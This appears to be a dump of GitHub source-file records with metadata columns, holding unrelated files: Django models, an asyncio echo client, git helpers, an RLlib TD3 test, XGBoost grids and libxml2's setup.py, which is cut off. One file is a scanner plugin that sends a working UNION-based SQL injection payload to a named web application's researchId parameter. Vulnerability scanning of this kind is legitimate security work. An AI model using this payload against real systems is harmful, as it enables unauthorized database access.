blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9c91809b744ff16932feb411b09b7423b511a93b | d83118503614bb83ad8edb72dda7f449a1226f8b | /src/dprj/platinumegg/app/cabaret/models/AppConfig.py | b3e39931ac2f8eb97496fa5f9e2cc1cdee59154c | [] | no_license | hitandaway100/caba | 686fe4390e182e158cd9714c90024a082deb8c69 | 492bf477ac00c380f2b2758c86b46aa7e58bbad9 | refs/heads/master | 2021-08-23T05:59:28.910129 | 2017-12-03T19:03:15 | 2017-12-03T19:03:15 | 112,512,044 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,988 | py | # -*- coding: utf-8 -*-
import settings_sub
from django.db import models
from platinumegg.app.cabaret.models.base.models import Singleton, BaseModel
from platinumegg.lib.opensocial.util import OSAUtil
from platinumegg.app.cabaret.models.base.fields import TinyIntField,\
AppDateTimeField, JsonCharField, PositiveAutoField, ObjectField
from defines import Defines
from platinumegg.app.cabaret.models.base.util import dict_to_choices
class AppConfig(Singleton):
    """Maintenance settings (singleton row).

    Holds the maintenance type, the maintenance time window, and the
    active master-data revision number.
    """
    class Meta:
        app_label = settings_sub.APP_NAME
        abstract = False
    # Maintenance type; defaults to EMERGENCY (see Defines.MaintenanceType.NAMES).
    maintenancetype = TinyIntField(verbose_name=u'メンテフラグ', choices=dict_to_choices(Defines.MaintenanceType.NAMES), default=Defines.MaintenanceType.EMERGENCY)
    # Maintenance window start/end; both default to "now" at row creation.
    stime = AppDateTimeField(default=OSAUtil.get_now, verbose_name=u'メンテ開始時間')
    etime = AppDateTimeField(default=OSAUtil.get_now, verbose_name=u'メンテ終了時間')
    # Active master-data revision number.
    master = models.PositiveIntegerField(default=0, verbose_name=u'マスターデータ番号')
    def is_maintenance(self):
        """Return True while maintenance is active.

        Emergency maintenance is always active; otherwise the current time
        must fall inside the half-open window [stime, etime).
        """
        if self.is_emergency():
            return True
        elif self.stime <= OSAUtil.get_now() < self.etime:
            return True
        return False
    def is_platform_maintenance(self):
        """Return True when the maintenance is platform-side (regular or emergency)."""
        return self.maintenancetype in (Defines.MaintenanceType.REGULAR_PLATFORM, Defines.MaintenanceType.EMERGENCY_PLATFORM)
    def is_emergency(self):
        """Return True for emergency maintenance (app-side or platform-side)."""
        return self.maintenancetype in (Defines.MaintenanceType.EMERGENCY, Defines.MaintenanceType.EMERGENCY_PLATFORM)
    @classmethod
    def getModel(cls):
        """Return the singleton row, creating and saving it on first access."""
        model = cls.getSingletonModel()
        if model is None:
            model = cls()
            model.save()
        return model
class PreRegistConfig(Singleton):
    """Pre-registration settings (singleton row)."""
    class Meta:
        app_label = settings_sub.APP_NAME
        abstract = False
    # Pre-registration deadline; defaults to "now" at row creation.
    etime = AppDateTimeField(default=OSAUtil.get_now, verbose_name=u'事前登録終了時間')
    # Pre-registration rewards, stored as a JSON-encoded list.
    prizes = JsonCharField(default=list, verbose_name=u'事前登録報酬')
    def is_before_publication(self):
        """Return True while the pre-registration period is still open."""
        now = OSAUtil.get_now()
        if now < self.etime:
            return True
        return False
class MessageQueue(BaseModel):
    """Queue entry for the message API."""
    class Meta:
        app_label = settings_sub.APP_NAME
        abstract = False
    id = PositiveAutoField(primary_key=True, verbose_name=u'ID')
    # Earliest send time; indexed so pending rows can be fetched efficiently.
    stime = AppDateTimeField(default=OSAUtil.get_now, verbose_name=u'送信開始時間', db_index=True)
    title = models.CharField(max_length=26, verbose_name=u'タイトル')
    body = models.CharField(max_length=100, verbose_name=u'本文')
    # Recipient list; per the verbose_name, unspecified means "everyone".
    recipients = ObjectField(default=list, verbose_name=u'送信先(未指定の場合は全員)')
    # Optional jump-target (destination) string; may be blank.
    jumpto = models.CharField(max_length=100, verbose_name=u'飛び先', blank=True)
| [
"shangye@mail.com"
] | shangye@mail.com |
c9fe70da36618c2cb74ba704579300f060bdfe9c | dcce56815dca2b18039e392053376636505ce672 | /dumpscripts/asyncio_echo_client_coroutine.py | 05309a636fa1c68dedb183a41da0a63c3998acb5 | [] | no_license | robertopauletto/PyMOTW-it_3.0 | 28ff05d8aeccd61ade7d4107a971d9d2576fb579 | c725df4a2aa2e799a969e90c64898f08b7eaad7d | refs/heads/master | 2021-01-20T18:51:30.512327 | 2020-01-09T19:30:14 | 2020-01-09T19:30:14 | 63,536,756 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,366 | py | # asyncio_echo_client_coroutine.py
import asyncio
import logging
import sys
# Message payload, deliberately split into parts so each write is visible
# in the debug log.  (Byte strings are Italian; they are sent verbatim.)
MESSAGES = [
    b"Questo e' il messaggio. ",
    b"Sara' inviato ",
    b'in parti.',
]
SERVER_ADDRESS = ('localhost', 10000)
# Log to stderr so debug output does not mix with any stdout traffic.
logging.basicConfig(
    level=logging.DEBUG,
    format='%(name)s: %(message)s',
    stream=sys.stderr,
)
log = logging.getLogger('main')
event_loop = asyncio.get_event_loop()
async def echo_client(address, messages):
    """Connect to the echo server at *address*, send *messages* one part at a
    time, then log each response chunk until the server closes the stream.
    """
    log = logging.getLogger('echo_client')
    log.debug('connessione a {} porta {}'.format(*address))
    reader, writer = await asyncio.open_connection(*address)
    # This could have been writer.writelines(), except that would have made
    # it harder to show each part of the message as it is being sent.
    for msg in messages:
        writer.write(msg)
        log.debug('in invio {!r}'.format(msg))
    # Signal end-of-input to the server when the transport supports it.
    if writer.can_write_eof():
        writer.write_eof()
    await writer.drain()
    log.debug('in attesa di risposta')
    while True:
        data = await reader.read(128)
        if data:
            log.debug('ricevuto {!r}'.format(data))
        else:
            # An empty read means the server closed its side: shut down too.
            log.debug('in chiusura')
            writer.close()
            return
try:
    # Drive the client coroutine to completion on the default event loop.
    event_loop.run_until_complete(
        echo_client(SERVER_ADDRESS, MESSAGES)
    )
finally:
    # Always close the loop, even when the client raises.
    log.debug('chiusura del ciclo di eventi')
    event_loop.close()
| [
"roberto.pauletto@gmail.com"
] | roberto.pauletto@gmail.com |
5aac4802175c9e01e52b360b66fd915af1002463 | e17680647cbaee4d2661246eac1357d7f1de1536 | /apps/organization/migrations/0004_auto_20180519_1313.py | bd9fef39819fa3e7e26363ba7b8ccf81ebee32c0 | [] | no_license | chenjb04/LearnOnline | 0cad4da6917121e889ce03928acd06f0e72313fc | 35dadcc73e3a803ca7756a51bbcc3e408912ab12 | refs/heads/master | 2020-04-26T17:21:43.360876 | 2019-05-06T08:18:43 | 2019-05-06T08:18:43 | 173,710,492 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 373 | py | # Generated by Django 2.0.5 on 2018-05-19 13:13
from django.db import migrations
class Migration(migrations.Migration):
    """Rename the misspelled CourseOrg field ``catgory`` to ``category``."""
    dependencies = [
        ('organization', '0003_courseorg_catgory'),
    ]
    operations = [
        migrations.RenameField(
            model_name='courseorg',
            old_name='catgory',
            new_name='category',
        ),
    ]
| [
"chenjb04@163.com"
] | chenjb04@163.com |
21d3203a342aae2ceed8f3725d137594722bd3ba | 41efe260c251c719f87e883cc97f3c796569c5ce | /deving/pstats_merge.py | 16347e4301e36cb3b64c3fd8be4318a421ce91cc | [] | no_license | orenovadia/deving | f49c4bb7a354d420644afc87c87c163f95ad4987 | 6b18347e43a556599593ec5f09248945966167de | refs/heads/master | 2020-03-10T07:10:47.326670 | 2019-02-10T23:21:18 | 2019-02-10T23:21:18 | 129,256,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 659 | py | from __future__ import print_function
import pstats
import click
@click.command(name='pstats_merge')
@click.argument(
    'from_files',
    type=click.Path(exists=True, file_okay=True, dir_okay=False, resolve_path=False),
    required=True,
    nargs=-1
)
@click.argument(
    'to_file',
    type=click.Path(exists=False, file_okay=True, dir_okay=False, resolve_path=False),
    required=True
)
def pstats_merge(from_files, to_file):
    """
    Merge multiple pstats profile dumps into a single file.

    FROM_FILES: one or more existing pstats dumps to combine.
    TO_FILE: destination file for the merged statistics.

    Using: https://docs.python.org/2/library/profile.html
    """
    # pstats.Stats accepts several filenames and aggregates them on load.
    p = pstats.Stats(*from_files)
    p.dump_stats(to_file)
if __name__ == '__main__':
    pstats_merge()
| [
"orenovad@gmail.com"
] | orenovad@gmail.com |
bfc3d935394fc6ca878f5a81da542c5dea036d5d | 82d6e248d6498f53455f9ccb40b6ff9667da8f2e | /Params/xgb_cv_params.py | 46a7ba704b2ce3ce71ca634f5f5c6062b486bd36 | [] | no_license | marvinxu-free/data_analysis | 650ddf35443e66c395c8c503cacc328e547298a5 | 7a552959fd6272a54488c59091fa8b820c3f19ce | refs/heads/master | 2020-03-22T04:00:09.938423 | 2018-07-02T16:32:20 | 2018-07-02T16:32:20 | 139,466,395 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,577 | py | # -*- coding: utf-8 -*-
# Project: local-spark
# Author: chaoxu create this file
# Time: 2017/10/13
# Company : Maxent
# Email: chao.xu@maxent-inc.com
from __future__ import print_function, division
# Fixed XGBoost settings shared across the grid searches below.
xgb_base_params = {
    'objective': 'binary:logistic',
    # 'objective' : 'binary:logitraw',
    'nthread': -1,
    # 'scale_pos_weight':scale_ios_ratio,
    # 'missing':-6.666,
    'seed': 42
}
# Generic hyper-parameter grid for cross-validated tuning.
xgb_test_params = {
    'learning_rate': [0.05, 0.1, 0.5],
    'n_estimators': range(10, 200, 10),
    'max_depth': range(3, 10, 2),
    'min_child_weight': range(1, 6, 2),
    'gamma': [i / 10.0 for i in range(0, 5)],
    'subsample': [i / 10.0 for i in range(6, 10)],
    'colsample_bytree': [i / 10.0 for i in range(6, 10)],
    'reg_alpha': [0, 0.001, 0.005, 0.01, 0.05],
}
# Grid used for the "qiaoda" dataset: finer 0.1-step ranges throughout.
xgb_qiaoda_params = {
    'learning_rate': [i / 10.0 for i in range(1, 10)],
    'n_estimators': range(1, 20, 1),
    'max_depth': range(3, 10, 1),
    'min_child_weight': range(1, 10, 1),
    'gamma': [i / 10.0 for i in range(1, 10)],
    'subsample': [i / 10.0 for i in range(1, 10)],
    'colsample_bytree': [i / 10.0 for i in range(1, 10)],
    'reg_alpha': [i / 10.0 for i in range(1, 10)],
}
# Grid used for the "jd" dataset: shallower trees and narrower ranges.
xgb_jd_params = {
    'learning_rate': [i / 10.0 for i in range(1, 10)],
    'n_estimators': range(1, 20, 1),
    'max_depth': range(1, 6, 1),
    'min_child_weight': range(1, 10, 1),
    'gamma': [i / 10.0 for i in range(1, 5)],
    'subsample': [i / 10.0 for i in range(1, 5)],
    'colsample_bytree': [i / 10.0 for i in range(1, 5)],
    'reg_alpha': [i / 10.0 for i in range(1, 5)],
}
| [
"marvinxu_free@163.com"
] | marvinxu_free@163.com |
d0023e8273cd6e97b2ad2bfdf9a6782d33bfc3e3 | bb109bd629c67a30a57850ebc97f9a9625aa998f | /wmtexe/cmi/git.py | 748d4b4a734ecdbb8b4082128123fa2889aa607b | [
"MIT"
] | permissive | csdms/wmt-exe | b0966f27792be853e8469f12a7e78aea24da6bfa | 9f6e5a20e65765389682161b985cab186db88fce | refs/heads/master | 2022-11-15T06:27:23.589160 | 2022-10-25T23:57:21 | 2022-10-25T23:57:21 | 22,662,428 | 0 | 2 | MIT | 2022-10-25T23:57:22 | 2014-08-05T23:04:09 | Python | UTF-8 | Python | false | false | 1,616 | py | #! /usr/bin/env python
import os
from .utils import which, check_output, system, cd, status
def git_repo_name(url):
    """Return the repository name for *url*: its basename minus any extension
    (so both ``.../wmt-exe.git`` and ``.../wmt-exe`` yield ``wmt-exe``)."""
    filename = os.path.basename(url)
    name, _extension = os.path.splitext(filename)
    return name
def git_repo_sha(url, git=None, branch='master'):
    """Return the first 10 characters of the remote *branch* head SHA for *url*.

    Runs ``git ls-remote`` (looking *git* up on PATH when not supplied) and
    parses its "<sha>\t<refname>" lines.  Raises KeyError when the branch
    does not exist on the remote.
    """
    git = git or which('git')
    lines = check_output([git, 'ls-remote', url]).strip().split(os.linesep)
    shas = dict()
    for line in lines:
        (sha, name) = line.split()
        shas[name] = sha
    return shas['refs/heads/{branch}'.format(branch=branch)][:10]
def git_clone(url, git=None, dir='.', branch='master'):
    """Shallow-clone *branch* of *url* into *dir* (which must already exist).

    Emulates ``git clone --depth=1 --branch <branch>`` by initialising an
    empty repository in *dir*, configuring the origin remote, fetching only
    the requested branch head, and hard-resetting the work tree to it.
    """
    git = git or which('git')
    with cd(dir):
        system([git, 'init', '-q'])
        system([git, 'config', 'remote.origin.url', url])
        system([git, 'config', 'remote.origin.fetch',
                '+refs/heads/*:refs/remotes/origin/*'])
        system([git, 'fetch', 'origin',
                '{branch}:refs/remotes/origin/{branch}'.format(branch=branch),
                '-n', '--depth=1'])
        system([git, 'reset', '--hard',
                'origin/{branch}'.format(branch=branch)])
def git_pull(url, dir='.', branch='master'):
    """Update an existing clone in *dir* by pulling *branch* from origin.

    NOTE(review): *url* is accepted for signature symmetry with git_clone
    but is never used here -- the remote already configured in *dir* is used.
    """
    with cd(dir):
        system(['git', 'checkout', '-q', branch])
        system(['git', 'pull', 'origin', '-q',
                'refs/heads/{branch}:refs/remotes/origin/{branch}'.format(branch=branch)])
def git_clone_or_update(url, dir='.', branch='master'):
    """Clone *url* into *dir*, or pull when *dir* already contains a git repo.

    The presence of a ``.git`` directory decides which path is taken; a
    status line is printed either way.
    """
    if os.path.isdir(os.path.join(dir, '.git')):
        status('Updating %s' % url)
        git_pull(url, dir=dir, branch=branch)
    else:
        status('Cloning %s' % url)
        git_clone(url, dir=dir, branch=branch)
| [
"mcflugen@gmail.com"
] | mcflugen@gmail.com |
8f5359219eca321f19a6e87ffc21568d1cd514cd | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02422/s434334605.py | 0f8d8509dfbc38c56d306e2d546cad7fb3863b38 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 420 | py | S = input()
# Read a command count, then apply print/reverse/replace commands to S.
# Each command names an inclusive index range [a, b] of S.
n = int(input())
for _ in range(n):
    q = input().split()
    a = int(q[1])
    b = int(q[2])
    if q[0] == "print":
        print(S[a:b + 1])
    elif q[0] == "reverse":
        # Slice the segment and reverse it with [::-1].  This replaces the
        # original negative-step slice, which needed a fragile special case
        # for a == 0 (where S[b:a-1:-1] would mean "up to the end").
        S = S[:a] + S[a:b + 1][::-1] + S[b + 1:]
    elif q[0] == "replace":
        # q[3] is the replacement text for S[a:b+1].
        S = S[:a] + q[3] + S[b + 1:]
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
fdd3bcccc3ab81cc1c4dd4ecddb857fc92b52c6c | 8f24e443e42315a81028b648e753c50967c51c78 | /rllib/algorithms/td3/tests/test_td3.py | 977c91fea4939895fe9cb6997559ab256cd0dcd1 | [
"MIT",
"BSD-3-Clause",
"Apache-2.0"
] | permissive | simon-mo/ray | d07efdada8d05c6e10417f96e8dfc35f9ad33397 | 1e42e6cd15e2fb96c217cba8484e59ed0ef4b0c8 | refs/heads/master | 2023-03-06T00:09:35.758834 | 2022-12-23T18:46:48 | 2022-12-23T18:46:48 | 122,156,396 | 4 | 2 | Apache-2.0 | 2023-03-04T08:56:56 | 2018-02-20T04:47:06 | Python | UTF-8 | Python | false | false | 4,032 | py | import numpy as np
import unittest
import ray
import ray.rllib.algorithms.td3 as td3
from ray.rllib.utils.framework import try_import_tf
from ray.rllib.utils.test_utils import (
check,
check_compute_single_action,
check_train_results,
framework_iterator,
)
tf1, tf, tfv = try_import_tf()
class TestTD3(unittest.TestCase):
    """Integration tests for the TD3 algorithm: build/train smoke test and
    exploration behaviour (random warm-up window, Gaussian noise scales)."""
    @classmethod
    def setUpClass(cls) -> None:
        # One Ray runtime shared by all tests in this class.
        ray.init()
    @classmethod
    def tearDownClass(cls) -> None:
        ray.shutdown()
    def test_td3_compilation(self):
        """Test whether TD3 can be built with both frameworks."""
        config = td3.TD3Config()
        # Test against all frameworks.
        for _ in framework_iterator(config, with_eager_tracing=True):
            algo = config.build(env="Pendulum-v1")
            num_iterations = 1
            for i in range(num_iterations):
                results = algo.train()
                check_train_results(results)
                print(results)
            check_compute_single_action(algo)
            algo.stop()
    def test_td3_exploration_and_with_random_prerun(self):
        """Tests TD3's Exploration (w/ random actions for n timesteps)."""
        config = td3.TD3Config().environment(env="Pendulum-v1")
        # Keep a copy of the default exploration config for the first phase.
        no_random_init = config.exploration_config.copy()
        random_init = {
            # Act randomly at beginning ...
            "random_timesteps": 30,
            # Then act very closely to deterministic actions thereafter.
            "stddev": 0.001,
            "initial_scale": 0.001,
            "final_scale": 0.001,
        }
        # Fixed observation reused for every action query below.
        obs = np.array([0.0, 0.1, -0.1])
        # Test against all frameworks.
        for _ in framework_iterator(config, with_eager_tracing=True):
            config.exploration(exploration_config=no_random_init)
            # Default GaussianNoise setup.
            algo = config.build()
            # Setting explore=False should always return the same action.
            a_ = algo.compute_single_action(obs, explore=False)
            check(algo.get_policy().global_timestep, 1)
            for i in range(50):
                a = algo.compute_single_action(obs, explore=False)
                check(algo.get_policy().global_timestep, i + 2)
                check(a, a_)
            # explore=None (default: explore) should return different actions.
            actions = []
            for i in range(50):
                actions.append(algo.compute_single_action(obs))
                check(algo.get_policy().global_timestep, i + 52)
            check(np.std(actions), 0.0, false=True)
            algo.stop()
            # Check randomness at beginning.
            config.exploration(exploration_config=random_init)
            algo = config.build()
            # ts=0 (get a deterministic action as per explore=False).
            deterministic_action = algo.compute_single_action(obs, explore=False)
            check(algo.get_policy().global_timestep, 1)
            # ts=1-29 (in random window).
            random_a = []
            for i in range(1, 30):
                random_a.append(algo.compute_single_action(obs, explore=True))
                check(algo.get_policy().global_timestep, i + 1)
                check(random_a[-1], deterministic_action, false=True)
            self.assertTrue(np.std(random_a) > 0.3)
            # ts > 30 (a=deterministic_action + scale * N[0,1])
            for i in range(50):
                a = algo.compute_single_action(obs, explore=True)
                check(algo.get_policy().global_timestep, i + 31)
                check(a, deterministic_action, rtol=0.1)
            # ts >> 30 (BUT: explore=False -> expect deterministic action).
            for i in range(50):
                a = algo.compute_single_action(obs, explore=False)
                check(algo.get_policy().global_timestep, i + 81)
                check(a, deterministic_action)
            algo.stop()
if __name__ == "__main__":
    import pytest
    import sys
    sys.exit(pytest.main(["-v", __file__]))
| [
"noreply@github.com"
] | simon-mo.noreply@github.com |
123fa1bf54e8b6e07efb17bac26e992b93729f39 | ff6248be9573caec94bea0fa2b1e4b6bf0aa682b | /output/StudentProblem/10.21.11.45/3/1569578443.py | 1753098b316b763fb20e3410fc4080977f4d3725 | [] | no_license | LennartElbe/codeEvo | 0e41b1a7705204e934ef71a5a28c047366c10f71 | e89b329bc9edd37d5d9986f07ca8a63d50686882 | refs/heads/master | 2020-12-21T17:28:25.150352 | 2020-03-26T10:22:35 | 2020-03-26T10:22:35 | 236,498,032 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 842 | py | ============================= test session starts ==============================
platform darwin -- Python 3.7.4, pytest-5.4.1, py-1.8.1, pluggy-0.13.1
rootdir: /tmp
collected 1 item
../../../../../tmp F [100%]
=================================== FAILURES ===================================
_____________________________________ test _____________________________________
def test():
"""tested leap funktion"""
assert leap(2004)
> assert leap(2001)
E assert False
E + where False = leap(2001)
/private/tmp/blabla.py:19: AssertionError
=========================== short test summary info ============================
FAILED ../../../../../tmp/::test - assert False
============================== 1 failed in 0.06s ===============================
| [
"lenni.elbe@gmail.com"
] | lenni.elbe@gmail.com |
e5220636500572d14722d578ed0d36e272a73c4c | d5125ccc1ef9915ffd72c575225a620aac5cb347 | /development/django_test_project/django_mysite/blog/models.py | dec8106056e3e47a4cc70ec40a2e11f392eae651 | [] | no_license | yurui829/stefanbo | 2231074e0e4f04438aff647563299ad1947bd760 | 449f862c81a3b4ae3e079ecb4a15b3a5cbcca701 | refs/heads/master | 2021-01-24T23:42:52.064783 | 2014-07-02T03:05:04 | 2014-07-02T03:05:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,119 | py | from django.db import models
# import easy_thumbnail
from easy_thumbnails.fields import ThumbnailerImageField
############################################################
class BlogPost(models.Model):
    """A simple blog entry: title, body text and a publication timestamp."""
    title = models.CharField(max_length=150)
    body = models.TextField()
    timestamp = models.DateTimeField()
class Item(models.Model):
name = models.CharField(max_length=250)
description = models.TextField()
class Meta:
ordering = ['name']
def __unicode__(self):
return self.name
@models.permalink
def get_absolute_url(self):
return ('item_detail', None, {'object_id': self.id})
class Photo(models.Model):
item = models.ForeignKey(Item)
title = models.CharField(max_length=100)
image = ThumbnailerImageField(upload_to='photos', blank=True)
caption = models.CharField(max_length=250, blank=True)
def __unicode__(self):
return self.title
#class Meta:
# ordering = ['title']
#def __unicode__(self):
# return self.title
#@models.permalink
#def get_absolute_url(self):
# return ('photo_detail', None, {'object_id': self.id})
| [
"stefan_bo@163.com"
] | stefan_bo@163.com |
cce604d7c87324c908134270009a9e2f9e3e3505 | bd9a09a3f1a8b2b5166c540ada93cc5b30591605 | /scanner/plugins/cms/others/hnkj_researchinfo_dan_sqli.py | 45e7bf7e021770805dc12e1b41a3c2330a28bc57 | [
"MIT"
] | permissive | iceyhexman/onlinetools | 3cb6e349fc30c515f96429abeab5fbcc430ac0cc | 61f2df7ff8e6ad97ca7901728c3ab749679a2bd0 | refs/heads/master | 2023-08-06T19:31:51.328657 | 2022-10-28T04:01:38 | 2022-10-28T04:01:38 | 119,565,769 | 1,662 | 358 | MIT | 2023-03-31T14:34:13 | 2018-01-30T16:51:46 | Python | UTF-8 | Python | false | false | 1,064 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: 汇能群管理系统SQL注入
referer: http://wooyun.org/bugs/wooyun-2010-0152664
author: Lucifer
description: 链接/main/model/childcatalog/researchinfo_dan.jsp?researchId=1中 researchID未过滤存在SQL注入漏洞
'''
import sys
import requests
class hnkj_researchinfo_dan_sqli_BaseVerify:
    """PoC check for a SQL injection in researchinfo_dan.jsp (researchId param).

    The injected UNION SELECT asks SQL Server to compute the MD5 of '1234';
    finding that digest in the response proves the parameter is injectable.
    """
    def __init__(self, url):
        # Base URL of the target site, e.g. "http://host:port".
        self.url = url
    def run(self):
        """Probe the target.

        Returns a finding string when vulnerable, "[-]connect timeout" on a
        network/HTTP failure, or None when the target is not vulnerable.
        """
        payload = "/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27)),3%20from%20H_System_User--"
        vulnurl = self.url + payload
        try:
            req = requests.get(vulnurl, timeout=10, verify=False)
            # 81dc9bdb... is md5('1234'), produced by the injected SELECT.
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                return "[+]存在汇能群管理系统 SQL注入漏洞...(高危)\tpayload: "+vulnurl
        except requests.RequestException:
            # Fix: the original bare ``except:`` also swallowed
            # KeyboardInterrupt/SystemExit and programming errors, reporting
            # them all as a timeout.  Only network/HTTP failures belong here.
            return "[-]connect timeout"
if __name__ == "__main__":
    testVuln = hnkj_researchinfo_dan_sqli_BaseVerify(sys.argv[1])
    testVuln.run()
] | 834430486@qq.com |
a34bf01cdd8b3293561d1ade7fa2babcf4b1d786 | 7034b7dec4a068493adde012e576891cb60c8d1e | /python/setup.py | f80a66c4f82ee2e5adb8436f2e19d3106f5beb50 | [
"MIT",
"LicenseRef-scancode-x11-xconsortium-veillard"
] | permissive | OpenCMISS-Dependencies/libxml2 | 4ed6741cfc7a9c89b03972422522203b28e6fc16 | 29930a028df0e92e6cec778f461194acc16d9c04 | refs/heads/v2.7.6 | 2022-05-02T03:33:26.421280 | 2022-04-26T21:26:34 | 2022-04-26T21:26:34 | 3,723,092 | 0 | 5 | NOASSERTION | 2021-04-19T21:25:51 | 2012-03-14T22:40:54 | C | UTF-8 | Python | false | false | 6,679 | py | #!/usr/bin/python -u
#
# Setup script for libxml2 and libxslt if found
#
import sys, os
from distutils.core import setup, Extension
# Below ROOT, we expect to find include, include/libxml2, lib and bin.
# On *nix, it is not needed (but should not harm),
# on Windows, it is set by configure.js.
ROOT = r'/usr'
# Thread-enabled libxml2
with_threads = 1
# If this flag is set (windows only),
# a private copy of the dlls are included in the package.
# If this flag is not set, the libxml2 and libxslt
# dlls must be found somewhere in the PATH at runtime.
WITHDLLS = 1 and sys.platform.startswith('win')
def missing(file):
    """Return 1 when *file* is not readable (or absent), 0 otherwise."""
    readable = os.access(file, os.R_OK)
    return 0 if readable else 1
# Resolve the user's home directory, falling back to a Windows-style
# default when the HOME environment variable is not set.
try:
    HOME = os.environ['HOME']
except KeyError:
    # Fix: was a bare ``except:``; only a missing key is expected here, and
    # a bare clause would also hide unrelated errors (e.g. KeyboardInterrupt).
    HOME = "C:"
if WITHDLLS:
    # libxml dlls (expected in ROOT/bin)
    dlls = [ 'iconv.dll','libxml2.dll','libxslt.dll','libexslt.dll' ]
    dlls = map(lambda dll: os.path.join(ROOT,'bin',dll),dlls)
    # create __init__.py for the libxmlmods package
    # (the package wraps the extension modules together with the dll copies)
    if not os.path.exists("libxmlmods"):
        os.mkdir("libxmlmods")
    open("libxmlmods/__init__.py","w").close()
def altImport(s):
    """Rewrite libxml2mod/libxsltmod import statements in *s* so the modules
    are loaded from the bundled ``libxmlmods`` package (private-DLL builds)."""
    rewritten = s.replace("import libxml2mod","from libxmlmods import libxml2mod")
    return rewritten.replace("import libxsltmod","from libxmlmods import libxsltmod")
# Platform-specific library naming: Windows builds link against "libxml2"
# etc., while *nix drops the prefix and additionally links m and z.
if sys.platform.startswith('win'):
    libraryPrefix = 'lib'
    platformLibs = []
else:
    libraryPrefix = ''
    platformLibs = ["m","z"]
# those are examined to find
# - libxml2/libxml/tree.h
# - iconv.h
# - libxslt/xsltconfig.h
includes_dir = [
    "/usr/include",
    "/usr/local/include",
    "/opt/include",
    os.path.join(ROOT,'include'),
    HOME
];
# Locate the libxml2 headers; abort the build if they cannot be found.
xml_includes=""
for dir in includes_dir:
    if not missing(dir + "/libxml2/libxml/tree.h"):
        xml_includes=dir + "/libxml2"
        break;
if xml_includes == "":
    print "failed to find headers for libxml2: update includes_dir"
    sys.exit(1)
# Locate the iconv headers; also required.
iconv_includes=""
for dir in includes_dir:
    if not missing(dir + "/iconv.h"):
        iconv_includes=dir
        break;
if iconv_includes == "":
    print "failed to find headers for libiconv: update includes_dir"
    sys.exit(1)
# those are added in the linker search path for libraries
libdirs = [
    os.path.join(ROOT,'lib'),
]
# Source/metadata files belonging to the libxml2 and libxslt bindings.
xml_files = ["libxml2-api.xml", "libxml2-python-api.xml",
             "libxml.c", "libxml.py", "libxml_wrap.h", "types.c",
             "xmlgenerator.py", "README", "TODO", "drv_libxml2.py"]
xslt_files = ["libxslt-api.xml", "libxslt-python-api.xml",
             "libxslt.c", "libxsl.py", "libxslt_wrap.h",
             "xsltgenerator.py"]
# Generate the libxml2 C stubs and Python wrapper when they are not present.
# Importing the generator module runs it as a side effect.
if missing("libxml2-py.c") or missing("libxml2.py"):
    try:
        try:
            import xmlgenerator
        except:
            import generator
    except:
        print "failed to find and generate stubs for libxml2, aborting ..."
        print sys.exc_type, sys.exc_value
        sys.exit(1)
    # Concatenate the hand-written prologue and the generated class file
    # into libxml2.py, rewriting imports when private DLLs are bundled.
    head = open("libxml.py", "r")
    generated = open("libxml2class.py", "r")
    result = open("libxml2.py", "w")
    for line in head.readlines():
        if WITHDLLS:
            result.write(altImport(line))
        else:
            result.write(line)
    for line in generated.readlines():
        result.write(line)
    head.close()
    generated.close()
    result.close()
# libxslt support is optional: enabled only when its stub generator and
# headers are available.
with_xslt=0
if missing("libxslt-py.c") or missing("libxslt.py"):
    if missing("xsltgenerator.py") or missing("libxslt-api.xml"):
        print "libxslt stub generator not found, libxslt not built"
    else:
        try:
            import xsltgenerator
        except:
            print "failed to generate stubs for libxslt, aborting ..."
            print sys.exc_type, sys.exc_value
        else:
            # Assemble libxslt.py the same way libxml2.py was assembled.
            head = open("libxsl.py", "r")
            generated = open("libxsltclass.py", "r")
            result = open("libxslt.py", "w")
            for line in head.readlines():
                if WITHDLLS:
                    result.write(altImport(line))
                else:
                    result.write(line)
            for line in generated.readlines():
                result.write(line)
            head.close()
            generated.close()
            result.close()
            with_xslt=1
else:
    with_xslt=1
# Even when the stubs exist, the libxslt headers must also be found.
if with_xslt == 1:
    xslt_includes=""
    for dir in includes_dir:
